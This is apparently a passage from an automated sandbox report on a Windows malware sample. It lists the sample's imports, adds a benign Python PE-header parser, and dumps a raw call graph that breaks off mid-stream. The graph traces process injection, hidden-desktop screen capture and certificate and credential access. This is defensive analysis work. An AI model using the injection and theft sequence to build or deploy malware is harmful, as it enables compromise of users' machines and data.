DLL | Import
KERNEL32.dll: VirtualAllocEx, FindClose, LoadLibraryA, RemoveDirectoryW, WaitForMultipleObjects, lstrcmpiW, FindNextFileW, VirtualProtect, GetFileTime, ReleaseMutex, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, LocalFree, GetSystemTime, WriteProcessMemory, SetFileAttributesW, CreateThread, ExpandEnvironmentStringsW, GetCurrentThreadId, ExitProcess, SetEvent, lstrcmpiA, WTSGetActiveConsoleSessionId, CreateEventW, MapViewOfFile, WriteFile, SetThreadPriority, VirtualProtectEx, TlsAlloc, TlsFree, GetFileAttributesExW, GetPrivateProfileStringW, GetPrivateProfileIntW, GetLocalTime, ResetEvent, TlsGetValue, TlsSetValue, TerminateProcess, MoveFileExW, GetModuleFileNameW, GetUserDefaultUILanguage, GetThreadContext, SetThreadContext, GetProcessId, GetNativeSystemInfo, GetVersionExW, GetCommandLineW, SetErrorMode, GetComputerNameW, OpenEventW, DuplicateHandle, GetCurrentProcessId, VirtualQueryEx, SetFileTime, VirtualAlloc, GetProcAddress, SetLastError, GetLastError, OpenMutexW, GetFileSizeEx, GetTempPathW, FlushFileBuffers, MultiByteToWideChar, IsBadReadPtr, GetProcessHeap, CreateFileW, GetTimeZoneInformation, ReadFile, Thread32Next, GetFileAttributesW, HeapCreate, HeapDestroy, ReadProcessMemory, Sleep, LoadLibraryW, WideCharToMultiByte, CreateFileMappingW, Thread32First, VirtualFree, GetCurrentThread, GetModuleHandleW, CreateDirectoryW, HeapFree, SetFilePointerEx, SystemTimeToFileTime, HeapAlloc, CreateProcessW, FreeLibrary, SetEndOfFile, FindFirstFileW, CreateMutexW, HeapReAlloc, GetTempFileNameW, FileTimeToDosDateTime, GetEnvironmentVariableW, CloseHandle, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualFreeEx, OpenProcess, CreateRemoteThread, WaitForSingleObject, EnterCriticalSection, GlobalUnlock, LeaveCriticalSection, InitializeCriticalSection, GetTickCount, UnmapViewOfFile, GlobalLock
USER32.dll: OpenInputDesktop, MenuItemFromPoint, GetMenu, RegisterClassExW, GetMenuItemRect, TrackPopupMenuEx, SystemParametersInfoW, GetClassNameW, GetMenuState, DefWindowProcA, DefMDIChildProcW, SwitchDesktop, GetMenuItemCount, DefDlgProcA, PostThreadMessageW, DefMDIChildProcA, HiliteMenuItem, DefFrameProcA, SendMessageW, CallWindowProcA, EndMenu, CallWindowProcW, DefWindowProcW, DefFrameProcW, GetWindowThreadProcessId, GetMessageW, GetShellWindow, CharLowerW, CreateDesktopW, SetProcessWindowStation, GetThreadDesktop, GetSystemMetrics, MapVirtualKeyW, GetUpdateRgn, CharLowerBuffA, ExitWindowsEx, FillRect, DrawEdge, IntersectRect, EqualRect, PrintWindow, GetWindowRect, PostMessageW, GetParent, GetWindowInfo, GetClassLongW, GetAncestor, SetWindowPos, IsWindow, MapWindowPoints, IsRectEmpty, DrawIcon, GetIconInfo, EndPaint, GetWindowDC, SetCapture, GetSubMenu, BeginPaint, GetMessageA, RegisterClassW, GetUpdateRect, DefDlgProcW, SetCursorPos, GetDCEx, ToUnicode, GetClipboardData, PeekMessageA, GetCursorPos, ReleaseCapture, GetMessagePos, CloseWindowStation, CreateWindowStationW, GetProcessWindowStation, OpenDesktopW, CloseDesktop, SetThreadDesktop, GetUserObjectInformationW, OpenWindowStationW, GetTopWindow, LoadImageW, MsgWaitForMultipleObjects, WindowFromPoint, CharToOemW, GetDC, GetWindowLongW, CharLowerA, RegisterClassExA, RegisterWindowMessageW, GetMenuItemID, SetKeyboardState, RegisterClassA, GetKeyboardState, TranslateMessage, DispatchMessageW, GetWindow, SendMessageTimeoutW, SetWindowLongW, CharUpperW, ReleaseDC, PeekMessageW, GetCapture
ADVAPI32.dll: GetLengthSid, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegOpenKeyExW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegCloseKey, RegSetValueExW, CryptHashData, EqualSid, RegEnumKeyExW, InitiateSystemShutdownExW, ConvertSidToStringSidW, IsWellKnownSid
SHLWAPI.dll: wvnsprintfW, PathQuoteSpacesW, PathIsURLW, PathRenameExtensionW, StrStrIW, StrStrIA, StrCmpNIW, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathRemoveBackslashW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathRemoveFileSpecW, PathFindFileNameW, PathIsDirectoryW, UrlUnescapeA
SHELL32.dll: ShellExecuteW, SHGetFolderPathW, CommandLineToArgvW
Secur32.dll: GetUserNameExW
ole32.dll: StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dll: RestoreDC, SaveDC, DeleteDC, GdiFlush, SetViewportOrgEx, SelectObject, CreateCompatibleDC, CreateDIBSection, GetDeviceCaps, GetDIBits, DeleteObject, SetRectRgn, CreateCompatibleBitmap
WS2_32.dll: WSASetLastError, freeaddrinfo, socket, bind, recv, setsockopt, shutdown, getsockname, getpeername, recvfrom, sendto, WSASend, WSAEventSelect, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, getaddrinfo, select, closesocket, send, listen, accept, WSAGetLastError
CRYPT32.dll: PFXExportCertStoreEx, CertDuplicateCertificateContext, CertEnumCertificatesInStore, PFXImportCertStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, CryptUnprotectData
WININET.dll: HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, HttpAddRequestHeadersA, HttpSendRequestW, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpSendRequestExA, InternetQueryOptionA, InternetCloseHandle, InternetOpenA, HttpSendRequestA, HttpOpenRequestA, InternetSetOptionA, InternetReadFile, InternetCrackUrlA, InternetQueryOptionW, InternetConnectA, HttpQueryInfoA
OLEAUT32.dll: VariantInit, SysAllocString, VariantClear, SysFreeString
NETAPI32.dll: NetApiBufferFree, NetUserEnum, NetUserGetInfo
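The static header fields above (timestamp 0x4DA70DA0, image base 0x400000, entry point 0x41d470, DLL characteristics TERMINAL_SERVER_AWARE and NX_COMPAT, three sections with their entropies) can be reproduced from the raw file without a third-party PE library. The parser below is an added example for this report, not code from Joe Sandbox or the sample. It reads the COFF and PE32 optional headers plus the section table, decodes the two flag words, and computes per-section Shannon entropy. Because the sample itself is not on the page, build_sample_pe() constructs a minimal image carrying the report's header values; its section bodies are synthetic, so the entropy figures it produces are test values, not the sample's 6.72 / 1.64 / 5.64.

```python
"""Stdlib-only PE32 header triage reproducing the static fields a sandbox report lists.

Added example for this report; not code from Joe Sandbox or from the sample.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timezone
from typing import Dict, List

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
SECTION_CHARACTERISTICS = {
    0x00000020: "IMAGE_SCN_CNT_CODE", 0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x02000000: "IMAGE_SCN_MEM_DISCARDABLE", 0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ", 0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform); values near 8 hint at packing/encryption."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    return [name for bit, name in table.items() if value & bit]


def parse_pe(data: bytes) -> dict:
    """Parse DOS stub -> PE signature -> COFF header -> PE32 optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ stub")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsec, ts, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 handled here")
    entry_rva, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, sc = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode(),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "entropy": shannon_entropy(data[rawptr:rawptr + rawsize]),
            "characteristics": decode_flags(sc, SECTION_CHARACTERISTICS),
        })
    return {
        "machine": machine,
        "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC"),
        "image_base": image_base,
        "entry_point": image_base + entry_rva,
        "subsystem": subsystem,
        "dll_characteristics": decode_flags(dll_chars, DLL_CHARACTERISTICS),
        "aslr": bool(dll_chars & 0x0040),   # DYNAMIC_BASE opts the image into ASLR
        "sections": sections,
    }


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 (not the real sample) carrying the report's header values."""
    sections = [  # name, RVA, synthetic body, characteristics
        (b".text", 0x1000, bytes(range(256)) * 4, 0x60000020),      # entropy 8.0
        (b".data", 0x22000, bytes(0x400), 0xC0000040),              # entropy 0.0
        (b".reloc", 0x25000, bytes(range(16)) * 0x40, 0x42000040),  # entropy 4.0
    ]
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                 # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    # COFF: I386, 3 sections, TimeDateStamp, no symbols, PE32 optional size, EXECUTABLE_IMAGE|32BIT_MACHINE
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, len(sections), 0x4DA70DA0, 0, 0, 0xE0, 0x0102)
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                 # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x1D470)          # AddressOfEntryPoint (RVA of 0x41d470)
    struct.pack_into("<I", hdr, opt + 28, 0x400000)         # ImageBase
    struct.pack_into("<HH", hdr, opt + 68, 2, 0x8100)       # WINDOWS_GUI; TERMINAL_SERVER_AWARE|NX_COMPAT
    raw_ptr, body = len(hdr), b""
    for i, (name, va, content, sc) in enumerate(sections):
        struct.pack_into("<8sIIIIIIHHI", hdr, opt + 0xE0 + 40 * i,
                         name, len(content), va, len(content), raw_ptr, 0, 0, 0, 0, sc)
        body += content
        raw_ptr += len(content)
    return bytes(hdr) + body


if __name__ == "__main__":
    for key, value in parse_pe(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Two observations fall straight out of the decoded fields. DllCharacteristics 0x8100 lacks DYNAMIC_BASE, so the image is not opted into ASLR even though a .reloc section exists: the module loads at 0x400000 and the 0_2_0040xxxx addresses quoted throughout this report are the real runtime addresses, which makes them directly usable in a debugger or memory-forensics tooling. Second, the "MS-DOS executable" label under Static File Info reflects only the MZ stub; the PE header at e_lfanew is what identifies the file as a 32-bit Windows GUI executable.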

Network Behavior

No network behavior found

Code Analysis

Execution Coverage:0.7%
Dynamic/Decrypted Code Coverage:1.3%
Signature Coverage:17%
Total number of Nodes:825
Total number of Limit Nodes:5

Graph

Rendered execution graph omitted; the main path recovered from the graph data (addresses are function starts, followed by the API calls the graph attributes to them):

Entry 0x41d470 -> 0x41c53b (initialisation): PEB read at 0x41c1f6, GetModuleHandleW, GetProcAddress, HeapCreate, GetProcessHeap, InitializeCriticalSection, WSAStartup, security descriptor setup via 0x4087d5 (InitializeSecurityDescriptor, SetSecurityDescriptorDacl, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, LocalFree), SHGetFolderPathW / GetVolumeNameForVolumeMountPointW / CLSIDFromString at 0x409789, GetVersionExW, CreateEventW, OpenProcessToken and GetTokenInformation, GetLengthSid, SHGetFolderPathW or GetModuleFileNameW at 0x41c2af, GetCurrentProcessId, IsBadReadPtr, lstrcmpiW, ReadFile, CloseHandle, InitializeCriticalSection.
0x41d488: SetErrorMode, GetCommandLineW, CommandLineToArgvW, LocalFree (the switch parsing shown in the entrypoint disassembly above).
0x41d16a: CreateFileW (0x40a402), StringFromGUID2 (0x41c946), CreateMutexW, GetLastError with a decision node leading to CloseHandle or on to ExitWindowsEx, OpenEventW, SetEvent, OpenMutexW (0x4089c9), ReadProcessMemory loop with Sleep, IsWellKnownSid, GetFileAttributesExW, VirtualProtect (0x40b607), VirtualFree, CreateEventW, WaitForSingleObject / WaitForMultipleObjects, ReleaseMutex, CloseHandle.
0x40d74c: GetCurrentThreadId, GetThreadDesktop, GetUserObjectInformationW, StringFromGUID2, then a message loop at 0x4179c2 (GetCurrentThread, SetThreadPriority, SetEvent, GetMessageW) with GDI and handle cleanup in 0x40d5c5 (DeleteObject, CloseHandle, TlsFree, UnmapViewOfFile, SelectObject, DeleteDC, WaitForSingleObject, PostThreadMessageW).
Termination: 0x41d551 Sleep, 0x41d55c ExitProcess.
GetTokenInformation 12737->12739 12738->12518 12738->12663 12740 406970 GetLastError 12739->12740 12741 4069de CloseHandle 12739->12741 12740->12741 12742 40697b 12740->12742 12741->12738 12752 4051b6 12742->12752 12744 406984 12745 40698a GetTokenInformation 12744->12745 12746 4069dd 12744->12746 12747 40699d GetSidSubAuthorityCount 12745->12747 12751 4069c0 12745->12751 12746->12741 12749 4069a9 12747->12749 12747->12751 12750 4069af GetSidSubAuthority 12749->12750 12749->12751 12750->12751 12755 4051e6 12751->12755 12753 4051ba 12752->12753 12754 4051bb HeapAlloc 12752->12754 12753->12744 12754->12744 12756 4051ed HeapFree 12755->12756 12757 4051ff 12755->12757 12756->12757 12757->12746 12759 4088f4 GetLastError 12758->12759 12764 40681f 12758->12764 12760 4088ff 12759->12760 12759->12764 12761 4051b6 HeapAlloc 12760->12761 12762 408907 12761->12762 12763 40890d GetTokenInformation 12762->12763 12762->12764 12763->12764 12765 408924 12763->12765 12764->12675 12764->12676 12766 4051e6 HeapFree 12765->12766 12766->12764 12768 4055a9 12767->12768 12769 4055ad 12767->12769 12768->12684 12770 4051b6 HeapAlloc 12769->12770 12770->12768 12772 40aa7b 12771->12772 12773 40aa8d PathCombineW 12771->12773 12772->12773 12773->12694 12775 41ccb7 12774->12775 12776 41c474 CreateFileW 12775->12776 12830 4053f1 12775->12830 12776->12702 12776->12703 12779 40aa77 PathCombineW 12780 41cd07 12779->12780 12780->12776 12781 41cd11 PathRenameExtensionW 12780->12781 12781->12776 12784 415f0b 12782->12784 12797 4160a1 12782->12797 12783 415f45 12788 415fa5 12783->12788 12839 4093c0 RegOpenKeyExW 12783->12839 12843 409413 12783->12843 12784->12783 12834 409465 RegCreateKeyExW 12784->12834 12789 415fbb RegOpenKeyExW 12788->12789 12790 415fe1 12789->12790 12791 415fd6 12789->12791 12793 415ff8 12790->12793 12794 4093c0 3 API calls 12790->12794 12846 40953c RegQueryValueExW RegCloseKey 12791->12846 12795 409465 3 API calls 12793->12795 12799 416014 12793->12799 12794->12793 12795->12799 
12801 40f74e 12797->12801 12798 4093c0 3 API calls 12798->12799 12799->12797 12799->12798 12800 409413 3 API calls 12799->12800 12847 405ed9 12799->12847 12800->12799 12802 40f766 GetModuleHandleW 12801->12802 12820 40f7f9 InitializeCriticalSection 12801->12820 12803 40f779 12802->12803 12802->12820 12804 40f7fb 12803->12804 12805 40f783 12803->12805 12806 40f4e0 13 API calls 12804->12806 12853 4051ce 12805->12853 12806->12820 12808 40f796 12808->12820 12856 40603d 12808->12856 12810 40f7b2 12811 4051e6 HeapFree 12810->12811 12812 40f7ba 12811->12812 12812->12820 12860 405faa 12812->12860 12816 40f7e5 12816->12820 12866 40f4e0 12816->12866 12819 4051e6 HeapFree 12819->12820 12820->12710 12928 40dfe1 12821->12928 12824 40e317 12824->12712 12827 40e07b 12826->12827 12828 40dfe1 10 API calls 12827->12828 12829 40e2a7 12828->12829 12829->12536 12831 4053f6 12830->12831 12832 4053fb MultiByteToWideChar 12830->12832 12831->12832 12833 405415 12832->12833 12833->12776 12833->12779 12835 4094b2 12834->12835 12836 40948d RegSetValueExW 12834->12836 12835->12783 12837 4094a7 12836->12837 12838 4094a9 RegCloseKey 12836->12838 12837->12838 12838->12835 12840 4093e2 12839->12840 12842 4093f8 12839->12842 12852 409432 RegQueryValueExW RegCloseKey 12840->12852 12842->12783 12844 409465 3 API calls 12843->12844 12845 40942e 12844->12845 12845->12783 12846->12790 12848 405ee2 12847->12848 12849 405ee7 12847->12849 12848->12799 12850 405ef2 wvnsprintfW 12849->12850 12851 405f0d 12850->12851 12851->12799 12852->12842 12854 4051d2 12853->12854 12855 4051d3 HeapAlloc 12853->12855 12854->12808 12855->12808 12857 406045 12856->12857 12859 40605d 12857->12859 12882 40539a 12857->12882 12859->12810 12894 405ff5 12860->12894 12863 40602b 12864 4051e6 HeapFree 12863->12864 12865 406032 12864->12865 12865->12816 12911 40f34a 12866->12911 12869 40f660 12869->12819 12870 40f515 12871 40aa77 PathCombineW 12870->12871 12872 40f524 12871->12872 12872->12869 12873 40aa77 PathCombineW 12872->12873 
12874 40f54c 12873->12874 12874->12869 12875 40f554 GetFileAttributesW 12874->12875 12875->12869 12879 40f56a 12875->12879 12876 405ed9 wvnsprintfW 12876->12879 12877 40f5ae GetPrivateProfileIntW 12877->12869 12878 40f5cf GetPrivateProfileStringW 12877->12878 12878->12879 12879->12869 12879->12876 12879->12877 12880 40aa77 PathCombineW 12879->12880 12913 40f667 12879->12913 12880->12879 12884 4053a7 12882->12884 12890 405365 12884->12890 12886 4053e4 12886->12859 12887 4051b6 HeapAlloc 12888 4053d0 12887->12888 12888->12886 12889 405365 WideCharToMultiByte 12888->12889 12889->12886 12891 40536a 12890->12891 12892 40536f WideCharToMultiByte 12890->12892 12891->12892 12893 40538c 12892->12893 12893->12886 12893->12887 12899 4054f4 12894->12899 12897 4051e6 HeapFree 12898 405fbc 12897->12898 12898->12863 12901 405502 12899->12901 12900 40553d 12900->12897 12900->12898 12901->12900 12903 405524 wvnsprintfA 12901->12903 12904 405171 12901->12904 12903->12901 12905 405181 12904->12905 12906 405175 12904->12906 12908 40519b HeapReAlloc 12905->12908 12909 40518b HeapAlloc 12905->12909 12907 4051e6 HeapFree 12906->12907 12910 40517c 12907->12910 12908->12910 12909->12910 12910->12901 12912 40f35e SHGetFolderPathW 12911->12912 12912->12869 12912->12870 12914 40f682 12913->12914 12915 40aa77 PathCombineW 12914->12915 12916 40f691 12915->12916 12917 40f748 12916->12917 12918 40f699 CreateFileW 12916->12918 12917->12879 12918->12917 12919 40f6c4 12918->12919 12920 40f6d5 WriteFile 12919->12920 12921 40f725 FlushFileBuffers CloseHandle 12920->12921 12925 40f6f6 12920->12925 12921->12917 12922 40f73c 12921->12922 12927 40a548 SetFileAttributesW DeleteFileW 12922->12927 12924 40f71a 12924->12921 12925->12921 12925->12924 12926 40f707 WriteFile 12925->12926 12926->12924 12927->12917 12929 40e007 VirtualAllocEx 12928->12929 12930 40dfee 12928->12930 12931 40e024 12929->12931 12932 40e058 12929->12932 12930->12929 12930->12932 12933 40e053 12931->12933 12937 409a29 12931->12937 
12932->12824 12936 40f807 InitializeCriticalSection GetProcAddress GetProcAddress GetProcAddress 12932->12936 12933->12932 12950 40deea 12933->12950 12936->12824 12957 4099e4 VirtualQueryEx 12937->12957 12940 409a49 VirtualProtectEx 12941 409b3d 12940->12941 12942 409a64 12940->12942 12941->12931 12943 409a71 ReadProcessMemory 12942->12943 12944 409b29 VirtualProtectEx 12943->12944 12945 409a8b 12943->12945 12944->12941 12946 409ad2 WriteProcessMemory 12945->12946 12949 409ad0 12945->12949 12947 409afd 12946->12947 12946->12949 12948 409b14 WriteProcessMemory 12947->12948 12948->12949 12949->12944 12951 40df74 12950->12951 12952 40def8 12950->12952 12951->12932 12952->12951 12953 4099e4 VirtualQueryEx 12952->12953 12954 40df21 VirtualProtectEx 12952->12954 12956 40df50 VirtualProtectEx 12952->12956 12953->12952 12954->12952 12955 40df36 WriteProcessMemory 12954->12955 12955->12952 12955->12956 12956->12952 12958 409a03 12957->12958 12958->12940 12958->12941 12962 405fbd 12959->12962 12967 40547e 12962->12967 12965 405f66 12965->12544 12965->12547 12966 4051e6 HeapFree 12966->12965 12968 405491 12967->12968 12969 405171 3 API calls 12968->12969 12970 4054dc 12968->12970 12971 4054be wvnsprintfW 12968->12971 12969->12968 12970->12965 12970->12966 12971->12968 12973 41c95a 12972->12973 12974 40983f StringFromGUID2 12973->12974 12975 41c97a 12974->12975 12975->12552 13010 405299 12976->13010 12978 40d373 TlsAlloc 12979 40d388 12978->12979 12994 40d381 12978->12994 12980 41c946 StringFromGUID2 12979->12980 12981 40d397 RegisterWindowMessageW 12980->12981 12982 40d3a8 12981->12982 12981->12994 12983 41c946 StringFromGUID2 12982->12983 12984 40d3b8 CreateEventW 12983->12984 12985 40d3d2 12984->12985 12984->12994 12986 41c946 StringFromGUID2 12985->12986 12987 40d3e2 CreateMutexW 12986->12987 12988 40d3f5 12987->12988 12987->12994 12989 41c946 StringFromGUID2 12988->12989 12990 40d405 CreateFileMappingW 12989->12990 12991 40d423 MapViewOfFile 12990->12991 12990->12994 
12992 40d437 GetDC 12991->12992 12991->12994 12993 40d457 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 12992->12993 12992->12994 12995 40d489 12993->12995 12996 40d49c ReleaseDC 12993->12996 12994->12555 12994->12556 13011 40b790 12995->13011 12996->12994 12999 40d4b6 12996->12999 13000 4051e6 HeapFree 12999->13000 13001 40d4e1 13000->13001 13001->12994 13002 41c946 StringFromGUID2 13001->13002 13003 40d547 CreateMutexW 13002->13003 13003->12994 13004 40d565 GetDC 13003->13004 13004->12994 13005 40d573 CreateCompatibleDC 13004->13005 13006 40d5b2 ReleaseDC 13005->13006 13007 40d584 CreateCompatibleBitmap 13005->13007 13006->12994 13007->13006 13008 40d597 SelectObject 13007->13008 13008->13006 13009 40d5ae 13008->13009 13009->13006 13010->12978 13012 4051b6 HeapAlloc 13011->13012 13013 40b7a6 13012->13013 13014 40b7b0 GetDIBits 13013->13014 13015 40b872 13013->13015 13018 40b7d2 GetDIBits 13014->13018 13019 40b868 13014->13019 13016 40b880 13015->13016 13017 40b877 DeleteObject 13015->13017 13016->12996 13017->13016 13018->13019 13020 40b7e8 DeleteObject 13018->13020 13019->13016 13021 4051e6 HeapFree 13019->13021 13022 40b80a CreateDIBSection 13020->13022 13021->13015 13022->13019 13077 40d2f3 GetClassNameW 13024->13077 13026 417295 SetEvent 13026->12558 13027 4172c1 GetWindowInfo 13027->13026 13029 4172f2 IntersectRect 13027->13029 13028 41728b 13028->13026 13028->13027 13030 417312 13029->13030 13031 41734e IntersectRect 13030->13031 13033 417349 13030->13033 13031->13033 13032 41739d GetDC 13032->13026 13034 4173ae CreateCompatibleDC ReleaseDC 13032->13034 13033->13026 13033->13032 13034->13026 13035 4173c7 SelectObject 13034->13035 13036 4173e7 13035->13036 13037 4173db DeleteDC 13035->13037 13038 4173f5 TlsSetValue 13036->13038 13039 417566 13036->13039 13037->13026 13042 4174b6 13038->13042 13043 417439 EqualRect 13038->13043 13040 4175c7 13039->13040 13041 41756c 13039->13041 13047 4175ac SelectObject DeleteDC 13040->13047 13051 4175d7 
SetViewportOrgEx 13040->13051 13052 4175e5 13040->13052 13044 417576 SetViewportOrgEx 13041->13044 13048 417584 13041->13048 13045 417557 TlsSetValue 13042->13045 13053 4174d1 SaveDC 13042->13053 13043->13042 13046 41744b SaveDC 13043->13046 13044->13048 13045->13047 13049 41745a 13046->13049 13050 41745f SetViewportOrgEx 13046->13050 13047->13026 13054 417193 GdiFlush 13048->13054 13049->13050 13055 41746d 13049->13055 13050->13055 13051->13052 13056 417193 GdiFlush 13052->13056 13057 4174e0 SetViewportOrgEx 13053->13057 13058 4174ee 13053->13058 13059 41758f DefWindowProcW 13054->13059 13079 417193 13055->13079 13061 4175f0 PrintWindow 13056->13061 13057->13058 13063 417193 GdiFlush 13058->13063 13062 4175a0 13059->13062 13061->13062 13065 4175ff 13061->13065 13066 417193 GdiFlush 13062->13066 13067 4174fa SendMessageW RestoreDC 13063->13067 13065->13047 13066->13047 13071 417528 SendMessageW 13067->13071 13072 41751a SetViewportOrgEx 13067->13072 13068 41749f 13070 417193 GdiFlush 13068->13070 13069 41748e DefWindowProcW 13069->13068 13073 4174ac RestoreDC 13070->13073 13074 417539 DefWindowProcW 13071->13074 13075 41754a 13071->13075 13072->13071 13073->13042 13074->13075 13076 417193 GdiFlush 13075->13076 13076->13045 13078 40d31a 13077->13078 13078->13028 13080 4171cf GdiFlush 13079->13080 13082 4171f7 SendMessageW 13080->13082 13082->13068 13082->13069 13084 406c03 CloseHandle 13083->13084 13085 406c06 13083->13085 13084->13085 13086 406c0c CloseHandle 13085->13086 13087 406c0f 13085->13087 13086->13087 13087->12576 13089 40a435 GetFileSizeEx 13088->13089 13092 40a453 13088->13092 13090 40a444 13089->13090 13091 40a49a CloseHandle 13089->13091 13090->13091 13090->13092 13093 40a459 VirtualAlloc 13090->13093 13091->13092 13092->12592 13097 41cde5 13092->13097 13093->13091 13094 40a46e ReadFile 13093->13094 13095 40a484 13094->13095 13096 40a48c VirtualFree 13094->13096 13095->13092 13095->13096 13096->13091 13098 41ce06 13097->13098 13100 41ce42 13098->13100 
13216 405239 13098->13216 13101 40a4aa 13100->13101 13102 40a4c1 13101->13102 13103 40a4b3 VirtualFree 13101->13103 13104 40a4c8 CloseHandle 13102->13104 13105 40a4cf 13102->13105 13103->13102 13104->13105 13105->12592 13107 40c4c3 13106->13107 13108 4053f1 MultiByteToWideChar 13107->13108 13112 40c54f 13107->13112 13109 40c516 13108->13109 13110 40c52a StrCmpNIW 13109->13110 13109->13112 13111 40c537 lstrcmpiW 13110->13111 13110->13112 13111->13112 13112->12597 13112->12605 13114 41d595 RegOpenKeyExW 13113->13114 13115 41d58b 13113->13115 13117 41d5b7 13114->13117 13121 41d5c8 13114->13121 13219 41cd2b 13115->13219 13227 4094b9 RegQueryValueExW 13117->13227 13119 41d610 13119->12622 13120 4051e6 HeapFree 13120->13119 13121->13119 13121->13120 13123 405015 CreateToolhelp32Snapshot 13122->13123 13124 405161 13123->13124 13125 40502d Process32FirstW 13123->13125 13126 4051e6 HeapFree 13124->13126 13133 40504c 13125->13133 13128 405169 13126->13128 13127 405153 CloseHandle 13127->13123 13127->13124 13128->12632 13128->12633 13129 40513b Process32NextW 13129->13133 13131 405090 OpenProcess 13132 405136 CloseHandle 13131->13132 13131->13133 13132->13129 13133->13127 13133->13129 13133->13131 13134 4067fd 8 API calls 13133->13134 13236 41c8d5 13133->13236 13135 4050b6 CloseHandle 13134->13135 13136 4050bf 13135->13136 13136->13132 13137 4050ca GetLengthSid 13136->13137 13138 4051e6 HeapFree 13136->13138 13139 405171 3 API calls 13136->13139 13243 404f6e OpenProcess 13136->13243 13137->13136 13138->13136 13139->13136 13147 41cec0 13141->13147 13142 41cf75 CloseHandle 13142->12597 13143 41cef4 13144 41cf0c 13143->13144 13145 4092a2 2 API calls 13143->13145 13146 41cf26 13144->13146 13148 4092a2 2 API calls 13144->13148 13145->13144 13149 4092a2 2 API calls 13146->13149 13150 41cf47 13146->13150 13147->13142 13147->13143 13282 4092a2 13147->13282 13152 41cf21 13148->13152 13154 41cf3b 13149->13154 13150->13142 13296 4092e7 13150->13296 13287 41849d 13152->13287 13156 4092a2 
2 API calls 13154->13156 13156->13150 13158 41cf5b CloseHandle 13158->13142 13158->13158 13160 41c946 StringFromGUID2 13159->13160 13161 41c994 CreateMutexW 13160->13161 13162 41c9b0 13161->13162 13163 41c9a9 13161->13163 13162->12606 13162->12608 13299 408932 WaitForSingleObject 13163->13299 13166 4089e9 13165->13166 13167 4089de CloseHandle 13165->13167 13166->12615 13167->13166 13169 40f34a 13168->13169 13170 40c892 LoadLibraryW 13169->13170 13171 40c8a5 13170->13171 13183 40c93c 13170->13183 13172 40c8b2 GetProcAddress 13171->13172 13173 40c930 FreeLibrary 13172->13173 13174 40c8c0 13172->13174 13175 40c943 13173->13175 13173->13183 13174->13173 13177 40c8d9 SHGetFolderPathW 13174->13177 13176 40c94e NetUserEnum 13175->13176 13178 40ca5f SHGetFolderPathW 13175->13178 13179 40c993 NetUserGetInfo 13175->13179 13180 40ca49 NetApiBufferFree 13175->13180 13190 40ca36 NetApiBufferFree 13175->13190 13191 40aa77 PathCombineW 13175->13191 13303 41c086 ConvertSidToStringSidW 13175->13303 13312 40a7f9 PathSkipRootW 13175->13312 13317 409696 13175->13317 13324 40bfbb 13175->13324 13342 40c0e8 13175->13342 13176->13175 13177->13173 13181 40c8f1 13177->13181 13182 